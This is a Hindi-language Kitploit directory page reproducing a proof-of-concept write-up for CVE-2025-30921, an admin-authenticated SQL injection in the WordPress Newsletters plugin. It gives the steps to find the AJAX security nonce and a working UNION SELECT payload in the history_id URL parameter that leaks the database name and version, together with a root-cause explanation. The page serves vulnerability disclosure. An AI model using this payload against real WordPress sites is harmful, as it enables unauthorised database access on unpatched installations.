Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-30921 — CVE-2025-30921 का PoC | Kitploit
उपकरण/GitHubGitHub/dottak/cve-2025-30921
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubdottak/cve-2025-30921

CVE-2025-30921

CVE-2025-30921 का PoC

रिपॉजिटरी देखें
11401 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-30921

1️⃣ घटक प्रकार

वर्डप्रेस प्लगइन

2️⃣ घटक विवरण

Component name Newsletters

Vulnerable version <= 4.9.9.7

Component slug newsletters-lite

Component link https://wordpress.org/plugins/newsletters-lite/

3️⃣ OWASP 2017: शीर्ष 10

Vulnerability class A3: Injection

Vulnerability type SQL Injection

4️⃣ पूर्व-आवश्यकता

व्यवस्थापक

5️⃣

टूल डाउनलोड करें
भेद्यता विवरण

👉 संक्षिप्त विवरण

Newsletters प्लगइन संस्करण 4.9.9.7 या उससे निचले संस्करण के डैशबोर्ड (/wp-admin/admin.php?page=newsletters) में सांख्यिकी अवलोकन चार्ट देखते समय, URL पैरामीटरों के अपर्याप्त इनपुट सत्यापन और एस्केप प्रसंस्करण के कारण SQL इंजेक्शन भेद्यता उत्पन्न होती है।

इस भेद्यता के माध्यम से, व्यवस्थापक विशेषाधिकारों वाला एक हमलावर लक्ष्य साइट से डेटाबेस जानकारी निकालने के लिए इसका शोषण कर सकता है।

👉 पुनरुत्पादन कैसे करें (PoC)

  1. Newsletters प्लगइन संस्करण 4.9.9.7 या उससे निचले संस्करण के साथ एक WordPress साइट तैयार करें।

  2. Newsletters प्लगइन डैशबोर्ड मेनू (/wp-admin/admin.php?page=newsletters) पर जाएँ।

    image

  3. ब्राउज़र डेवलपर टूल का उपयोग करके, 'Elements' टैब में action=wpmlwelcomestats&security= खोजें और security का मान जाँचें। उदाहरण के लिए, यदि खोज परिणाम नीचे दिखाए अनुसार दिखाई देता है, तो 22b1ac0de6 नोट करें।

    root@kitploit:~
    // ...
    
    jQuery.getJSON(newsletters_ajaxurl + 'action=wpmlwelcomestats&security=22b1ac0de6', ajaxdata, function(json) {
    
    // ...
    

    image

  4. नीचे दिए गए URL पथ के <SECURITY VALUE> अनुभाग में नोट किए गए security मान दर्ज करें और उस URL पर अनुरोध भेजें

    root@kitploit:~
    http://localhost:8080/wp-admin/admin-ajax.php?action=wpmlwelcomestats&security=<SECURITY VALUE>&type=years&chart=bar&from=2024-12-31&to=2024-12-31&history_id=FOO%27+UNION+SELECT+(CONCAT((DATABASE()),%22-%22,(@@VERSION))),NULL+LIMIT+1,2+%23
    

    URL पैरामीटरों में से, history_id में SQL इंजेक्शन पेलोड होता है, जो डेटाबेस नाम (DATABASE()) और संस्करण (@@VERSION) को क्वेरी करने की अनुमति देता है। उदाहरण के लिए, जब security मान 22b1ac0de6 है, तो निम्नलिखित URL तक पहुँचें।

    http://localhost:8080/wp-admin/admin-ajax.php?action=wpmlwelcomestats&security=22b1ac0de6&type=years&chart=bar&from=2024-12-31&to=2024-12-31&history_id=FOO%27+UNION+SELECT+(CONCAT((DATABASE()),%22-%22,(@@VERSION))),NULL+LIMIT+1,2+%23

  5. URL अनुरोध प्रतिक्रिया की जाँच करते समय, आप पुष्टि कर सकते हैं कि history_id पैरामीटर के माध्यम से SQL इंजेक्शन भेद्यता के कारण डेटाबेस का नाम और संस्करण जानकारी उजागर हो गई है।

    image

👉 अतिरिक्त जानकारी (वैकल्पिक)

[भेद्यता का मूल कारण]

उपरोक्त PoC में SQL इंजेक्शन भेद्यता उत्पन्न करने वाले URL का अनुरोध करते समय, /wp-content/plugins/newsletters-lite/wp-mailinglist-plugin.php फ़ाइल के अंदर ajax_welcomestats फ़ंक्शन कॉल किया जाता है।

इस बिंदु पर, अनुरोध पैरामीटर history_id को SQL क्वेरी स्ट्रिंग में एक शर्त खंड के रूप में सीधे संदर्भित किया जाता है और चर $history_condition के रूप में आरंभ किया जाता है। इस चर को बिना किसी एस्केप प्रसंस्करण के डेटाबेस क्वेरी में पारित किया जाता है।

image

इसलिए, चूँकि URL पैरामीटर history_id में दर्ज किए गए मानों के लिए कोई सत्यापन या एस्केप प्रसंस्करण नहीं है, SQL इंजेक्शन भेद्यता उत्पन्न होती है। (ध्यान दें कि URL पैरामीटर from और to भी अपर्याप्त इनपुट सत्यापन और एस्केप प्रसंस्करण के कारण SQL इंजेक्शन हमलों के लिए असुरक्षित हैं।)

6️⃣ शोषण डेमो

video

7️⃣ संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2025-30921